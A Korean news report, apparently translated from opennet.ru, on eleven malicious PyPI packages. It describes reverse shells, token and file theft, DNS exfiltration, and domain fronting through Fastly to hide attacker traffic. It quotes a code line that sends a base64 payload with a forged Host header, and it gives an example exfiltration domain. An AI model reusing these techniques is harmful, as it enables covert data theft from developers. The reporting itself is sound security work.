PyPI CDN을 사용하여 통신 채널을 숨기는 악성 라이브러리가 PyPI 카탈로그에서 식별되었습니다.

PyPI(Python Package Index) 디렉터리에서 악성코드가 포함된 패키지 11개가 식별되었습니다. 문제가 확인되기 전에 패키지는 총 38회 다운로드되었습니다. 탐지된 악성 패키지는 공격자 서버와의 통신 채널을 숨기기 위해 정교한 방법을 사용하는 것으로 유명합니다.

• importantpackage(6305 다운로드), important-package(12897) - 시스템에 대한 쉘 액세스(리버스 쉘)를 제공하기 위해 pypi.python.org에 연결하는 것처럼 가장하여 외부 서버에 대한 연결을 설정하고 trevorc2 프로그램을 사용하여 통신 채널.
• pptest(10001), ipboards(946) - 시스템에 대한 정보(첫 번째 패킷에는 호스트 이름, 작업 디렉터리, 내부 및 외부 IP, 두 번째 패킷에는 사용자 이름 및 호스트 이름)를 전송하기 위한 통신 채널로 DNS를 사용했습니다. .
• owlmoon(3285), DiscordSafety(557), yiffparty(1859) - 시스템에서 Discord 서비스 토큰을 식별하여 외부 호스트로 보냈습니다.
• trrfab (287) - /etc/passwd, /etc/hosts, /home의 식별자, 호스트 이름 및 내용을 외부 호스트로 보냈습니다.
• 10Cent10 (490) - 외부 호스트와의 역방향 쉘 연결을 설정했습니다.
• yandex-yt(4183) - 시스템이 손상되었다는 메시지를 표시하고 nda.ya.ru(api.ya.cc)를 통해 실행된 추가 조치에 대한 추가 정보가 있는 페이지로 리디렉션됩니다.

특히 주목할 점은 importantpackage 및 important-package 패키지에 사용되는 외부 호스트에 액세스하는 방법입니다. 이 패키지는 활동을 숨기기 위해 PyPI 디렉터리에 사용되는 Fastly 콘텐츠 전달 네트워크를 사용했습니다. 실제로 요청은 pypi.python.org 서버로 전송되었지만(HTTPS 요청 내부의 SNI에 python.org 이름 지정 포함), HTTP “Host” 헤더에는 공격자가 제어하는 ​​서버 이름이 포함되어 있었습니다(sec. forward.io.global.prod.fastly.net). 콘텐츠 전송 네트워크는 데이터를 전송할 때 pypi.python.org에 대한 TLS 연결 매개변수를 사용하여 공격 서버에 유사한 요청을 보냈습니다.

PyPI 인프라는 Varnish 투명 프록시를 사용하여 일반적인 요청을 캐시하고 최종 서버가 아닌 CDN 수준에서 TLS 인증서 처리를 사용하여 프록시를 통해 HTTPS 요청을 전달하는 Fastly 콘텐츠 전달 네트워크로 구동됩니다. 대상 호스트에 관계없이 요청은 HTTP "호스트" 헤더를 사용하여 원하는 호스트를 결정하는 프록시로 전송되며 호스트 도메인 이름은 모든 Fastly 클라이언트에 일반적인 CDN 로드 밸런서 IP 주소에 연결됩니다.

공격자의 서버는 또한 모든 사람에게 무료 요금제를 제공하고 익명 등록도 허용하는 CDN Fastly에 등록합니다. "역방향 셸"을 생성할 때 피해자에게 요청을 보내는 방식도 사용되지만 공격자의 호스트 측에서 시작된다는 점은 주목할 만합니다. 외부에서 볼 때 공격자 서버와의 상호 작용은 PyPI TLS 인증서를 사용하여 암호화된 PyPI 디렉터리와의 합법적인 세션처럼 보입니다. 이전에는 "도메인 프론팅"으로 알려진 유사한 기술이 차단을 우회할 때 호스트 이름을 숨기는 데 적극적으로 사용되었으며, 일부 CDN 네트워크에서 제공되는 기능을 사용하여 SNI에 가상 호스트를 표시하고 실제로 도메인 이름을 전송하여 HTTPS에 액세스했습니다. TLS 세션 내부의 HTTP 호스트 헤더에 요청된 호스트.

악의적인 활동을 숨기기 위해 TrevorC2 패키지를 추가로 사용하여 일반 웹 탐색과 유사하게 서버와 상호 작용했습니다. 예를 들어 "https://pypi.python.org/images/" 이미지를 다운로드하는 것처럼 위장하여 악의적인 요청이 전송되었습니다. guid=” guid 매개변수에 정보 인코딩이 포함되어 있습니다. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})

pptest 및 ipboards 패키지는 DNS 서버에 대한 쿼리에서 유용한 정보 인코딩을 기반으로 네트워크 활동을 숨기기 위해 다른 접근 방식을 사용했습니다. 악성코드는 “nu4timjagq4fimbuhe.example.com”과 같은 DNS 요청을 수행하여 정보를 전송하는데, 제어 서버로 전송되는 데이터는 하위 도메인 이름에 base64 형식을 사용하여 인코딩됩니다. 공격자는 example.com 도메인의 DNS 서버를 제어하여 이러한 메시지를 받습니다.

출처 : opennet.ru